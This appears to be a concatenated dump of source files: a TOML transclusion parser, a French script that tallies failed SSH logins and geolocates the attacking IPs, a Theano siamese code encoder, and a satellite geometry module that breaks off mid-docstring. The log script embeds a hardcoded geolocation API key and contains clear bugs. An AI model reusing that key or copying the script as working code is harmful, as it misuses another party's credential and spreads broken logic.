(parent_reference.parent / path).resolve()\n\n return cls.from_file(path, extend_key=extend_key, level=level)\n\n @property\n def _log_indent(self):\n return \" \" * 2 * self.level\n\n def _log_document(self, document):\n raw = document.as_string()\n return _(\n f\"\"\"\n{\"=\"*30}{self} CONTENTS STARTS HERE{\"=\"*30}\n{raw}\n{\"=\"*30}{self} CONTENTS END HERE{\"=\"*30}\"\"\"\n ).replace(\"\\n\", f\"\\n{self._log_indent}\")\n\n def parse(self) -> TOMLDocument:\n \"\"\"Parse recursively until no transclusions are required.\n\n Returns:\n The parsed, transcluded document.\n \"\"\"\n document = super().parse()\n logger.info(\"%s: Parsing started\", self)\n logger.debug(\n \"%s: Source contents:\\n\\n%s\", self, self._log_document(document)\n )\n\n while True:\n base_key_locations = sorted(\n deep_find(document, self.extend_key),\n key=lambda path_ct: path_ct[0],\n )\n\n if not base_key_locations:\n logger.debug(\"%s: No %s found\", self, self.extend_key)\n break\n logger.info(\n \"%s: Found '%s': at %s\",\n self,\n self.extend_key,\n [\n \".\".join(crumbs_val[0]) or \"(document root)\"\n for crumbs_val in base_key_locations\n ],\n )\n\n for breadcrumbs, value in base_key_locations:\n logger.debug(\n \"%s: Before merging %s contents:\\n\\n%s\",\n self,\n breadcrumbs,\n self._log_document(document),\n )\n merge = TomlMerger(document, self)\n merge(value, breadcrumbs, delete_dangling=True)\n logger.debug(\n \"%s: After merging %s contents:\\n\\n%s\",\n self,\n breadcrumbs,\n self._log_document(document),\n )\n\n logger.info(\"%s: Parsing finished\", self)\n logger.debug(\n \"%s: Final contents:\\n\\n%s\",\n self,\n self._log_document(document),\n )\n return document\n","repo_name":"pwoolvett/drytoml","sub_path":"src/drytoml/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":6662,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"34984922189","text":"#python\n# -*- coding: utf-8 -*-\n#log.v4.py : afficher \n\nimport operator\nimport collections\nfrom typing import OrderedDict\nimport urllib.request\nimport json \n\n#dictionnaire \n\ni = 0\nvalid_user = {}\ninvalid_user = {}\nIp = {}\n\n# ouverture du fichier big.log, localisation et serie1.js on va ouvrir le serie2.js plus tard.\ntext = open('fichier\\\\auth.big.log', 'r')\nlocalisation = open('highcharts\\\\localisations2.js', 'w')\nserie1 = open('highcharts\\\\serie1.js', 'w')\n\n\n\nerreur = \"Invalid user\"\nerreur_2 = \"Failed password\"\nerreur_3 = \"Failed password for invalid user\"\n\n#si il y'a des erreurs alors prendre la bonne valeurs de position du mot \n\nfor line in text:\n mot = line.split(' ')\n \n if erreur in line:\n IPV4 = mot [9]\n utilisateur = mot [7]\n # si l'erreur invalid user est detectée alors l'utilisateur et le 7eme mot et l'IPV4 est le 9 mot\n if utilisateur in invalid_user.keys():\n invalid_user[utilisateur] = invalid_user[utilisateur] + 1\n else:\n invalid_user[utilisateur] = 1\n # si l'utilisateur est un utilisateur invalid alors on rajoute un et si on l'a jamais eu avant, le rajouter.\n elif erreur_3 in line:\n IPV4 = mot [12] \n # si l'erreur trois est détecté l'Ipv4 sera le 12eme mots \n elif erreur_2 in line:\n IPV4 = mot [10]\n utilisateur = mot[8]\n # si l'erreur deux est détectée l'ipv4 sera le 10eme mot et l'utilisateur est le 8eme mot \n \n else:\n continue # sinon continuer \n \n if IPV4 in Ip.keys():\n Ip[IPV4] = Ip[IPV4] + 1\n # si l'ipv4 est déjà dans notre liste alors on l'ajoute à la au même utilisateur \n \n else:\n Ip[IPV4] = 1\n # si on a jamais eu l'adresse IPV4 alors on l'ajoute à notre liste\n\n # nous voulons sortir tout d'abord les invalid_users \n\nprint ('invalid_users') # j'écris des print pour vérifier les étapes pendant l'execution de notre script \n\n # permet de faire le tri des 'invalid_users' \n\ninvalid_user = sorted(invalid_user.items(), key=operator.itemgetter(1),reverse=True)\nvar = collections.OrderedDict(invalid_user)\n\n\n # nous devons écrire le début du texte pour que le diagramme marche correctement\n\n\nserie1.write(\"\"\"Highcharts.chart('serie1',\n{\n chart: {\n type: 'pie'\n },\n\t\ttitle: {\n\t\t\ttext: 'Analyse de auth.log'\n\t\t},\n\t\tsubtitle: {\n\t\t\ttext: 'Users inconnu utilise pour des attaques SSH'\n\t\t},\n series: [{\n data: [ \"\"\")\n\nj = 0 \n # nous voulons écrire les 13 premiers utilisateurs et après écrire les autres \nwhile j <= 13:\n j += 1 \n # écrire chaque clés et chaque valeurs pour les invalid_user\n i += 1 \n cle = (list(var.keys())[i-1])\n valeur = (list(var.values())[i-1])\n\n \n serie1.write('\\n [ \\'{}\\' , {}], \\n'.format(cle,valeur))\n\n \n #sortir les invalid user \nserie1.write(\"\"\"\\n]\n\\n }]\n\\n });\n\"\"\")\n\n # fermeture du fichier 1\nserie1.close()\n\n\nprint(\"End (invalid_users)\")\n\n #trouver dans les lignes du big_log les utilisateurs valid avec les Ip correspondante\n\n\n \n # il faut maintenant s'occuper des valid_user \nprint('valid_users')\n\n #ouverture du fichier series2.js\nserie2 = open('highcharts\\\\serie2.js', 'w')\n\n #l'utilisateur se retrouve sur le 6 mot\nfor line in text:\n mot = line.split(' ')\n utilisateur = mot [6]\n\n #triage du dictionnaire valid_user \nvalid_user = sorted(valid_user.items(), key=operator.itemgetter(1),reverse=True)\nvar = collections.OrderedDict(valid_user)\n\n #écrire dans le fichier serie2.js pour avoir le resultat sous forme de diagramme \nserie2.write(\"\"\"Highcharts.chart('serie2',\n{\n chart: {\n type: 'pie'\n },\n\t\ttitle: {\n\t\t\ttext: 'Analyse de auth.log'\n\t\t},\n\t\tsubtitle: {\n\t\t\ttext: 'Users connu utilise pour des attaques SSH'\n\t\t},\n series: [{\n data: [ \"\"\")\n\n\nfor key, valeur in var.items():\n #sortir les valid user \n i += 1 \n cle = (list(var.keys())[i-1])\n valeur = (list(var.values())[i-1])\n\n \nserie2.write('[ \\'{}\\' , {}], \\n'.format(cle,valeur)) # écrire la clé et la valeur \n\n # écrire dans la fin du fichier pour pouvoir écrire correctement dans le diagramme \nserie2.write(\"\"\"\\n] \n\\n }]\n\\n });\n\"\"\")\n\ni = 0\n \nprint(\"end (valid_users)\")\n\n\n # fermeture du fichier2.py \n\nserie2.close()\n\nprint('ip')\n\n # trier les Ip ordre décroissant\nIp = sorted(Ip.items(), key=operator.itemgetter(1),reverse=True)\nvar = collections.OrderedDict(Ip)\n\n # écriture du début du fichier \n\nlocalisation.write('var locations =[') # début d'écriture sur notre fichier localisation2.js\nAPI = '3a2b5be0-75a0-11ec-acd1-89ce18e6dbfe' # ma clé API \nURL = \"https://geolocation-db.com/json/\" # URL de notre site de géolocalisation d'ip qu'on a exploser XD\nruz = 0\nfor key, valeur in var.items():\n \n \n i += 1 \n cle = (list(var.keys())[i-1])\n valeur = (list(var.values())[i-1])\n # refaire comme dans le log.v4.py, afficher l'ip et enfin la latitude et longtitude pour l'afficher encore sur notre superbe carte \n with urllib.request.urlopen(\"{}/{}/{}\".format(URL,API,cle)) as url:\n data = json.loads(url.read().decode())\n \n\n # prendre l'ip la latitude et la longitude \n\n if data['latitude'] != 'Not found' or data['longitude'] != 'Not found': # on traite ce fichier avec une erreur not found pour éviter de faire planter le python\n localisation.write('\\n [\"{} ({} attaques)\", {}, {}],'.format(cle, valeur, data['latitude'], data['longitude'])) # on affiche l'ip et le reste pour la carte \n\n\n# j'écris une ] à la fin pour pouvoir avoir le fichier localisation deux qui marche correctement \n \nlocalisation.write('\\n]')\n\n\n# je print end (ip) pour vérifier ou en est l'execution du fichier car c'est long :)\n\nprint(\"end (ip)\")\n\n\n\n\n# fermeture du fichier Big.log et du fichier localisation.js\ntext.close()\nlocalisation.close()\n\n","repo_name":"lucas04200/LOG","sub_path":"log.v5.py","file_name":"log.v5.py","file_ext":"py","file_size_in_byte":5903,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41892414396","text":"import time\nfrom collections import defaultdict\nfrom itertools import chain, permutations\n\nimport numpy as np\nimport theano\nfrom scipy.spatial.distance import pdist\nfrom theano import tensor as T\nfrom theano.tensor.shared_randomstreams import RandomStreams\nfrom tqdm import trange\n\nfrom encoders.token.tokendata import TokenAutoencoderDatasetExtractor\n\ntheano.config.floatX = \"float32\"\n\nfrom encoders.baseencoder import AbstractEncoder\nfrom data.dataimport import import_data\nfrom data.featuredict import get_empirical_distribution\nfrom deeplearning.layers import GRU, AveragingGRU\nfrom deeplearning.optimization import nesterov_rmsprop_multiple\nfrom deeplearning.utils import Bunch\n\n\nclass SequenceGruSiameseEncoderModel:\n \"\"\"\n A sequence GRU siamese encoder\n \"\"\"\n\n def __init__(self, embedding_size: int, vocabulary_size: int, empirical_distribution, representation_size: int,\n hyperparameters: dict, encoder_type: str, name: str = \"GRUSequenceSiameseEncoder\", use_centroid=False):\n self.__hyperparameters = hyperparameters\n self.__name = name\n log_init_noise = self.__hyperparameters[\"log_init_noise\"]\n\n self.__memory_size = representation_size\n self.__embedding_size = embedding_size\n self.__vocabulary_size = vocabulary_size\n self.__empirical_distribution = empirical_distribution\n self.__encoder_type = encoder_type\n\n embeddings = np.random.randn(vocabulary_size, embedding_size) * 10 ** log_init_noise\n self.__embeddings = theano.shared(embeddings.astype(theano.config.floatX), name=name + \":embeddings\")\n self.__name_bias = theano.shared(np.log(empirical_distribution).astype(theano.config.floatX),\n name=name + \":name_bias\")\n\n encoder_init_state = np.random.randn(representation_size) * 10 ** log_init_noise\n self.__encoder_init_state = theano.shared(encoder_init_state.astype(theano.config.floatX),\n name=name + \":encoder_init_state\")\n\n self.__rng = RandomStreams()\n\n self.__input_sequence = T.ivector(name + \":input_sequence\")\n\n if encoder_type == 'gru':\n self.__encoder = GRU(self.__embeddings, representation_size, embedding_size,\n self.__hyperparameters, self.__rng, name=name + \":GRUSequenceEncoder\",\n use_centroid=use_centroid)\n elif encoder_type == 'averaging_gru':\n self.__encoder = AveragingGRU(self.__embeddings, representation_size, embedding_size,\n self.__hyperparameters, self.__rng,\n name=name + \":AveragingGRUSequenceEncoder\", use_centroid=use_centroid)\n else:\n raise Exception(\"Unrecognized encoder type `%s`, possible options `gru` and `averaging_gru`\")\n\n self.__params = {\"embeddings\": self.__embeddings,\n \"encoder_init_state\": self.__encoder_init_state}\n self.__params.update(self.__encoder.get_params())\n\n @property\n def rng(self):\n return self.__rng\n\n @property\n def parameters(self):\n return self.__params\n\n @property\n def input_sequence_variable(self):\n return self.__input_sequence\n\n def get_encoding(self):\n \"\"\"\n Return the encoding of the sequence.\n \"\"\"\n encoded_rep = self.__encoder.get_encoding(self.__input_sequence, self.__encoder_init_state)\n return encoded_rep\n\n def copy_full(self, name):\n copy = SequenceGruSiameseEncoderModel(self.__embedding_size, self.__vocabulary_size,\n self.__empirical_distribution,\n self.__memory_size, self.__hyperparameters, self.__encoder_type,\n name=name)\n copy.__name_bias = self.__name_bias\n copy.__embeddings = self.__embeddings\n copy.__encoder_init_state = self.__encoder_init_state\n copy.__rng = self.__rng\n copy.__encoder = self.__encoder\n copy.__params = dict\n return copy\n\n\nclass SequenceGruSiameseEncoder(AbstractEncoder):\n \"\"\"\n Train an encoder\n \"\"\"\n\n def __init__(self, training_file, hyperparameters, encoder_type='gru', use_centroid=False):\n \"\"\"\n\n :param training_file:\n :type hyperparameters: dict\n :return:\n \"\"\"\n self.__hyperparameters = hyperparameters\n\n self.dataset_extractor = TokenAutoencoderDatasetExtractor(training_file)\n\n empirical_distribution = get_empirical_distribution(self.dataset_extractor.feature_map,\n chain(*self.dataset_extractor.get_nonnoisy_samples(\n import_data(training_file))))\n self.__encoder = SequenceGruSiameseEncoderModel(self.__hyperparameters[\"embedding_size\"],\n len(self.dataset_extractor.feature_map),\n empirical_distribution,\n self.__hyperparameters[\"representation_size\"],\n self.__hyperparameters, encoder_type=encoder_type,\n use_centroid=use_centroid)\n\n self.__trained_parameters = None\n self.__compiled_methods = None\n\n REQUIRED_HYPERPARAMETERS = {'log_learning_rate', 'rmsprop_rho', 'momentum', 'grad_clip', 'minibatch_size',\n 'embedding_size', 'representation_size', 'log_init_noise', 'dropout_rate'}\n\n def __get_siamese_loss(self, use_dropout, scale_similar=1, scale_dissimilar=1):\n encoder_copy = self.__encoder.copy_full(name=\"siameseEncoder\")\n encoding_1 = self.__encoder.get_encoding()\n encoding_2 = encoder_copy.get_encoding()\n\n representation_distance = (encoding_1 - encoding_2).norm(2)\n similar_loss = -scale_similar * T.pow(representation_distance, 2)\n margin = self.__hyperparameters['dissimilar_margin']\n dissimilar_loss = -scale_dissimilar * T.pow(T.nnet.relu(margin - representation_distance), 2)\n return dissimilar_loss, similar_loss, encoder_copy, encoding_1, encoding_2\n\n def __compile_train_functions(self):\n dissimilar_loss, similar_loss, encoder_copy, repr1, repr2 = self.__get_siamese_loss(True)\n\n wrt_vars = list(self.__encoder.parameters.values())\n\n grad_acc = [theano.shared(np.zeros(param.get_value().shape).astype(theano.config.floatX)) for param in wrt_vars] \\\n + [theano.shared(0, name=\"sample_count\")]\n\n grad = T.grad(similar_loss, wrt_vars)\n self.__compiled_methods.grad_siamese_similar = theano.function(\n inputs=[encoder_copy.input_sequence_variable, self.__encoder.input_sequence_variable],\n updates=[(v, v + g) for v, g in zip(grad_acc, grad)] + [\n (grad_acc[-1], grad_acc[-1] + 1)],\n outputs=[similar_loss, repr1, repr2])\n\n grad = T.grad(dissimilar_loss, wrt_vars)\n self.__compiled_methods.grad_siamese_dissimilar = theano.function(\n inputs=[encoder_copy.input_sequence_variable, self.__encoder.input_sequence_variable],\n updates=[(v, v + g) for v, g in zip(grad_acc, grad)] + [\n (grad_acc[-1], grad_acc[-1] + 1)],\n outputs=[dissimilar_loss, repr1, repr2])\n\n normalized_grads = [T.switch(grad_acc[-1] > 0, g / grad_acc[-1].astype(theano.config.floatX), g) for g in\n grad_acc[:-1]]\n step_updates, ratios = nesterov_rmsprop_multiple(wrt_vars, normalized_grads,\n learning_rate=10 ** self.__hyperparameters[\n \"log_learning_rate\"],\n rho=self.__hyperparameters[\"rmsprop_rho\"],\n momentum=self.__hyperparameters[\"momentum\"],\n grad_clip=self.__hyperparameters[\"grad_clip\"],\n output_ratios=True)\n step_updates.extend([(v, T.zeros(v.shape)) for v in grad_acc[:-1]]) # Set accumulators to 0\n step_updates.append((grad_acc[-1], 0))\n\n self.__compiled_methods.grad_step = theano.function(inputs=[], updates=step_updates, outputs=ratios)\n\n def __compile_test_functions(self):\n dissimilar_loss, similar_loss, encoder_copy, _, _ = self.__get_siamese_loss(False)\n self.__compiled_methods.test_similar_loss = theano.function(\n inputs=[encoder_copy.input_sequence_variable, self.__encoder.input_sequence_variable], outputs=similar_loss)\n self.__compiled_methods.test_dissimilar_loss = theano.function(\n inputs=[encoder_copy.input_sequence_variable, self.__encoder.input_sequence_variable],\n outputs=dissimilar_loss)\n\n self.__compiled_methods.encode = theano.function(inputs=[self.__encoder.input_sequence_variable],\n outputs=self.__encoder.get_encoding())\n\n def __compile_if_needed(self):\n if self.__compiled_methods is None:\n print(\"Compiling Methods...\")\n self.__compiled_methods = Bunch()\n self.__compile_train_functions()\n self.__compile_test_functions()\n print(\"Compilation Finished...\")\n\n def train(self, training_file: str, validation_file: str, max_iter: int = 1000, patience: int = 25,\n validation_check_limit: int = 1, additional_code_to_run=None) -> tuple:\n self.__compile_if_needed()\n\n minibatch_size = self.__hyperparameters[\"minibatch_size\"]\n training_data = import_data(training_file)\n training_set = list(self.dataset_extractor.get_dataset_for_encoder(training_data, return_num_tokens=True))\n validation_set = list(\n self.dataset_extractor.get_dataset_for_encoder(import_data(validation_file), return_num_tokens=True))\n best_score = float('-inf')\n train_x_ent = 0\n epochs_not_improved = 0\n historic_values = []\n\n trainable_parameters = list(self.__encoder.parameters.values())\n\n print(\"Num classes: %s\" % self.dataset_extractor.num_equivalence_classes)\n\n def compute_validation_score() -> float:\n return compute_score(validation_set)\n\n def compute_score(dataset) -> float:\n # Get all encodings\n encodings = []\n equivalents = defaultdict(set)\n for i, tree in enumerate(dataset):\n encodings.append(self.__compiled_methods.encode(tree[0]))\n equivalents[tree[2]].add(i)\n\n encodings = np.array(encodings, dtype=theano.config.floatX)\n distances = pdist(encodings, metric='euclidean')\n\n is_similar = np.zeros_like(distances, dtype=np.int)\n for equivalence_set in equivalents.values():\n for i, j in permutations(equivalence_set, 2):\n if i > j:\n is_similar[encodings.shape[0] * j - int(j * (j + 1) / 2) + i - 1 - j] = 1\n\n similar_score = -np.sum(np.power(distances * is_similar, 2))\n\n margin = self.__hyperparameters['dissimilar_margin']\n differences = margin - distances\n rectified_diffs = differences * (differences > 0)\n dissimilar_score = -np.sum(np.power(rectified_diffs * (1 - is_similar), 2))\n\n print(\"Similar Loss: %s Dissimilar Loss: %s\" % (-similar_score, -dissimilar_score))\n return similar_score + dissimilar_score\n\n if self.__trained_parameters is None:\n best_score = float('-inf')\n else:\n best_score = compute_validation_score()\n print(\"Previous best validation score: %s\" % best_score)\n\n try:\n print(\"[%s] Training Started...\" % time.asctime())\n sum_similar_loss = 0\n num_similar_loss = 0\n sum_dissimilar_loss = 0\n num_dissimilar_loss = 0\n ratios = np.zeros(len(list(self.__encoder.parameters.values())))\n epochs_not_improved = 0\n # Clump minibatches and disallow minibatches that are smaller than their given size, since they may\n # cause instability.\n num_minibatches = max(1, min(int(np.floor(float(len(training_set)) / minibatch_size)), 2))\n\n current_max_size = 4.\n curriculum_step = .1\n\n for i in range(max_iter):\n sample_ordering = []\n for j, tree in enumerate(training_set):\n if tree[-1] <= current_max_size:\n sample_ordering.append(j)\n current_max_size += curriculum_step\n np.random.shuffle(np.array(sample_ordering, dtype=np.int32))\n n_batches = 0\n\n for j in trange(num_minibatches, desc=\"Minibatch\"):\n for k in trange(j * minibatch_size, min((j + 1) * minibatch_size, len(sample_ordering)),\n desc=\"Sample\", leave=False):\n current_idx = sample_ordering[k]\n # Add siamese gradients, by picking num_examples\n num_examples = 1 # The max number of examples to pick from TODO: as parameter\n similar_snippet_idxs = []\n dissimilar_snippet_idxs = []\n for l in range(len(sample_ordering)):\n if l == k:\n continue\n other_idx = sample_ordering[l]\n if training_set[current_idx][2] == training_set[other_idx][2]:\n similar_snippet_idxs.append(other_idx)\n else:\n dissimilar_snippet_idxs.append(other_idx)\n dissimilar_snippet_idxs = np.array(dissimilar_snippet_idxs)\n\n np.random.shuffle(similar_snippet_idxs)\n for other_idx in similar_snippet_idxs:\n loss, repr1, repr2 = self.__compiled_methods.grad_siamese_similar(\n list(training_set[current_idx][0]), list(training_set[other_idx][0]))\n sum_similar_loss += loss\n num_similar_loss += 1\n\n for other_idx in dissimilar_snippet_idxs:\n loss, repr1, repr2 = self.__compiled_methods.grad_siamese_dissimilar(\n training_set[current_idx][0], training_set[other_idx][0])\n sum_dissimilar_loss += loss\n num_dissimilar_loss += 1 if loss < 0 else 0\n\n n_batches += 1\n ratios += self.__compiled_methods.grad_step()\n\n if i % validation_check_limit == validation_check_limit - 1:\n print(\"Iteration %s Stats\" % i)\n current_score = compute_validation_score()\n if current_score > best_score:\n best_score = current_score\n self.__trained_parameters = [p.get_value() for p in list(self.__encoder.parameters.values())]\n print(\"At %s validation: current_score=%s [best so far]\" % (i, current_score))\n epochs_not_improved = 0\n else:\n print(\"At %s validation: current_score=%s\" % (i, current_score))\n epochs_not_improved += 1\n for k in range(len(list(self.__encoder.parameters.values()))):\n print(\"%s: %.0e\" % (list(self.__encoder.parameters.values())[k].name, ratios[k] / n_batches))\n\n print(\"Train sum similar-loss: %s (%s samples)\" % (sum_similar_loss, num_similar_loss))\n print(\"Train sum dissimilar-loss: %s (%s samples)\" % (sum_dissimilar_loss, num_dissimilar_loss))\n print(\"Training Set stats: %s\" % compute_score(training_set[:500]))\n\n historic_values.append({\"validation_xent\": current_score})\n\n sum_similar_loss = 0\n num_similar_loss = 0\n sum_dissimilar_loss = 0\n num_dissimilar_loss = 0\n ratios = np.zeros_like(ratios)\n if additional_code_to_run is not None: additional_code_to_run()\n if epochs_not_improved >= patience:\n print(\"Not improved for %s epochs. Stopping...\" % patience)\n break\n print(\"[%s] Training Finished...\" % time.asctime())\n except (InterruptedError, KeyboardInterrupt):\n print(\"Interrupted. Exiting training gracefully...\")\n\n return best_score, historic_values\n\n def __save_current_params_as_best(self):\n self.__trained_parameters = [p.get_value() for p in list(self.__encoder.parameters.values())]\n\n def save(self, filename: str):\n tmp, self.__compiled_methods = self.__compiled_methods, None\n AbstractEncoder.save(self, filename)\n self.__compiled_methods = tmp\n\n def get_representation_vector_size(self) -> int:\n return self.__hyperparameters[\"representation_size\"]\n\n def get_encoding(self, data: tuple) -> np.array:\n self.__compile_if_needed()\n converted_tokens = self.dataset_extractor.tokens_to_array(data[0])\n return self.__compiled_methods.encode(converted_tokens)\n\n def decoder_loss(self, data: tuple, representation: np.array) -> float:\n raise NotImplementedError(\"An encoder cannot do this operation\")\n","repo_name":"mast-group/eqnet","sub_path":"encoders/token/grussiameseencoder.py","file_name":"grussiameseencoder.py","file_ext":"py","file_size_in_byte":18070,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"31"} +{"seq_id":"14436184348","text":"\"\"\" \r\nModule Geometry\r\n\r\nContains functions and classes for Geometry related\r\nproblems when working with OCO-2 sat data.\r\n\r\nMain useful definitions are:\r\n\r\nCoordGeom class for calculating distances in\r\nvarious bases from lat/lon coordinates\r\n\r\nSZA class for calculating model enhancements taking\r\ninto account zenith/azimuth angle corrections\r\n\"\"\"\r\n\r\nimport sys\r\nfrom math import sin, pi, acos, cos, atan2, tan\r\nimport math\r\n\r\nimport scipy\r\nimport scipy.integrate\r\nimport numpy\r\nfrom osgeo import ogr\r\n\r\nimport PlumeModel\r\n\r\n# Earth's radius in m\r\n_earth_radius = 6.371e6\r\n\r\n\r\ndef convex_hull(points):\r\n \"\"\"Computes the convex hull of a set of 2D points.\r\n \r\n Implements Andrew's monotone chain algorithm. O(n log n) complexity.\r\n\r\n Args: an iterable sequence of (x, y) pairs representing the points.\r\n \r\n Returns: a list of vertices of the convex hull in counter-clockwise order,\r\n starting from the vertex with the lexicographically smallest coordinates.\r\n \"\"\"\r\n\r\n # Sort the points lexicographically (tuples are compared lexicographically).\r\n # Remove duplicates to detect the case we have just one unique point.\r\n points = sorted(set(points))\r\n\r\n # Boring case: no points or a single point, possibly repeated multiple times.\r\n if len(points) <= 1:\r\n return points\r\n\r\n # 2D cross product of OA and OB vectors, i.e. z-component of their 3D cross product.\r\n # Returns a positive value, if OAB makes a counter-clockwise turn,\r\n # negative for clockwise turn, and zero if the points are collinear.\r\n def cross(o, a, b):\r\n return (a[0] - o[0]) * (b[1] - o[1]) - (a[1] - o[1]) * (b[0] - o[0])\r\n\r\n # Build lower hull \r\n lower = []\r\n for p in points:\r\n while len(lower) >= 2 and cross(lower[-2], lower[-1], p) <= 0:\r\n lower.pop()\r\n lower.append(p)\r\n\r\n # Build upper hull\r\n upper = []\r\n for p in reversed(points):\r\n while len(upper) >= 2 and cross(upper[-2], upper[-1], p) <= 0:\r\n upper.pop()\r\n upper.append(p)\r\n\r\n # Concatenation of the lower and upper hulls gives the convex hull.\r\n # Last point of each list is omitted because it is repeated at the beginning of the other list. \r\n return lower[:-1] + upper[:-1]\r\n\r\n \r\ndef dist(lat1,lon1,lat2,lon2):\r\n \"\"\"Computes the geodetic distance between two points.\r\n \r\n Function works naively, assuming Earth is a perfect sphere. Distance\r\n is calculated from the range between the two position vectors\r\n defined by (lat1, lon1) and (lat2, lon), and the radius of the Earth.\r\n \r\n Args:\r\n lat1, lon1, lat2, lon2: latitude and longitude of two points on\r\n Earth, measured in radians.\r\n \r\n Returns:\r\n Distance (float > 0) along the surface of the Earth (in meters)\r\n between points (lat1, lon1) and (lat2, lon2)\r\n \r\n Raises:\r\n ValueError if calculation fails\r\n \"\"\"\r\n dlat = lat2-lat1\r\n dlon = lon2-lon1\r\n if dlat==0 and dlon==0:\r\n return 0.\r\n try:\r\n angle = acos((sin(lat1)*sin(lat2))+(cos(lat1)*cos(lat2)*cos(lon2-lon1)))\r\n except ValueError:\r\n raise ValueError(\"Math domain error. Coordinates given were\\\r\n ({0},{1}), ({2},{3})\".format(lat1, lon1, lat2, lon2))\r\n r = _earth_radius*angle\r\n return r\r\n\r\n \r\nclass CoordGeom(object):\r\n \"\"\"Calculates distances between points in various bases.\r\n \r\n Uses dist function to compute absolute distance between two\r\n points, and uses either the lat/lon grid or the direction of\r\n the wind to define a basis to express this distance in.\r\n \r\n Attributes:\r\n wind: a PST.Wind instance defining the wind speed and direction;\r\n direction is used to define a wind basis (x\\hat, y\\hat)\r\n \"\"\"\r\n def __init__(self, wind):\r\n \"\"\"Initializes CoordGeom instance from a given Wind instance, wind.\"\"\"\r\n self.wind = wind\r\n \r\n def coord_to_dist(self, lat1d, lon1d, lat2d, lon2d):\r\n \"\"\"Converts lat/lon coordinate pairs to North/East distance coords.\r\n \r\n The distance between (lat1d, lon1d) and (lat2d, lon2d) along the\r\n surface of earth (assuming it is perfectly spherical) is calculated\r\n using the dist function, and is expressed as the pair (x, y); x is\r\n distance East, y is distance North.\r\n \r\n Args: 4 angles defining two lat/lon points, measured in degrees\r\n \r\n Returns: East, North distance coordinates (x, y)\r\n \"\"\"\r\n lat1=lat1d*pi/180.\r\n lat2=lat2d*pi/180.\r\n lon1=lon1d*pi/180.\r\n lon2=lon2d*pi/180.\r\n dlon = lon2 - lon1\r\n dlat = lat2-lat1\r\n r = abs(dist(lat1,lon1,lat2,lon2))\r\n x = dist(lat1,lon1,lat1,lon2)*numpy.sign(dlon)\r\n y = dist(lat1,lon1,lat2,lon1)*numpy.sign(dlat)\r\n return (x,y)\r\n \r\n def distance(self, lat1d, lon1d, lat2d, lon2d):\r\n \"\"\"Calculates the absolute distance between lat/lon pair.\r\n \r\n This is an alias for the dist function, but here the\r\n angles must be measured in degrees not radians\r\n \r\n Args:\r\n 4 angles defining two lat/lon points, measured in degrees\r\n \r\n Returns:\r\n Distance (float>0) between pair of points along Earth's surface\r\n \"\"\"\r\n lat1=lat1d*pi/180.\r\n lat2=lat2d*pi/180.\r\n lon1=lon1d*pi/180.\r\n lon2=lon2d*pi/180.\r\n dlon = lon2 - lon1\r\n dlat = lat2-lat1\r\n r = abs(dist(lat1,lon1,lat2,lon2))\r\n return r\r\n \r\n def to_wind_basis(self, x, y):\r\n \"\"\"Converts North/East coordinates to wind basis coordinates.\r\n \r\n The wind basis is defined as x\\hat in the direction along the wind,\r\n and y\\hat in the direction perpendicular to the wind.\r\n \r\n This basis was accidentally defined in a left handed way. That is,\r\n x\\hat (cross) y\\hat = -1. Be careful when selecting y distances in\r\n subsequent functions/classes/methods.\r\n \r\n Args:\r\n x, y: East, North coordinates\r\n \r\n Returns:\r\n Tuple (xw, yw); the position (x, y) re-expressed in the basis along\r\n and perpendicular to the wind direction\r\n \"\"\"\r\n theta = atan2(y,x) # angle of the vector (x, y) wrt positive x-axis\r\n alpha = atan2(self.wind.v, self.wind.u) # angle of the wind vector wrt positive x-axis\r\n beta = alpha-theta # angle between the wind vector and position vector\r\n r = (x**2 + y**2)**0.5\r\n x_new = (r*cos(beta))\r\n y_new = (r*sin(beta))\r\n return (x_new,y_new)\r\n \r\n def coord_to_wind_basis(self, lat1, lon1, lat2, lon2):\r\n \"\"\"Converts lat/lon pair to a distance in the wind basis.\r\n \r\n Combines methods coord_to_dist and to_wind_basis to convert\r\n directly from a lat/lon pair specified in degrees to a\r\n coordinate pair in m along and perpendicular to the wind.\r\n \r\n Args:\r\n 4 angles defining two lat/lon points, measured in degrees\r\n \r\n Returns:\r\n Tuple (x, y); distance along Earth's surface in the basis\r\n defined by the wind. Be careful that this basis is accidentally\r\n defined in a left-handed sense. Recommended to use KML maps\r\n to identify whether you want to use positive or negative y\r\n \"\"\"\r\n x,y = self.coord_to_dist(lat1, lon1, lat2, lon2)\r\n x_new, y_new = self.to_wind_basis(x, y)\r\n return (x_new, y_new)\r\n \r\n def sza_offset(self, zenith, azimuth):\r\n \"\"\"Calculates the relative offset caused by the zenith/azimuth angles.\r\n \r\n See the math document describing these offsets in much more deail.\r\n When the solar zenith and azimuth angles are taken into account, the\r\n model plume essentially must be shifted in the (x, y) direction by an\r\n amount determined by the height, solar zenith angle, and solar\r\n azimuth angle.\r\n \r\n Args:\r\n zenith: zenith angle in degrees\r\n azimuth: azmith angle in degrees\r\n \r\n Returns:\r\n Tuple (x, y); the x and y offsets necessary to correct the\r\n model enhancements by based on the solar geometry\r\n \"\"\"\r\n azimuth *= pi/180.\r\n zenith *= pi/180.\r\n h = self.wind.height\r\n r = h*tan(zenith)\r\n x = r*sin(azimuth)\r\n y = r*cos(azimuth)\r\n return self.to_wind_basis(x,y)\r\n \r\n @staticmethod\r\n def cartesian_distance(v1, v2):\r\n \"\"\"Calculates the Euclidean norm of (v2-v1).\r\n \r\n This function is meant to be used for small distances (~ a few km)\r\n since it assumes flat ground. It uses the standard formula for\r\n distance between two points in a plane (L2-norm).\r\n \r\n Args:\r\n 2 tuples of (x, y) distance coordinates\r\n \r\n Returns:\r\n float>0 distance between the two points assuming flat ground\"\"\"\r\n x1, y1 = v1\r\n x2, y2 = v2\r\n return ((x2-x1)*(x2-x1) + (y2-y1)*(y2-y1))**0.5\r\n \r\n @staticmethod\r\n def sgn(x):\r\n \"\"\"Determines which half of the plane (x>0 or x<0) the angle x lies in.\r\n \r\n x is measured north-clockwise positive, the standard convention for\r\n cardinal bearings. This function is useful for determing forward-\r\n or back-scatter for solar/sensor zenith angle corrections.\r\n \r\n Args:\r\n Angle x measured in degrees (0<=x<=360)\r\n \r\n Returns:\r\n int -1 or +1; -1 means angle is in left half of plane, 1800, the area in m^2 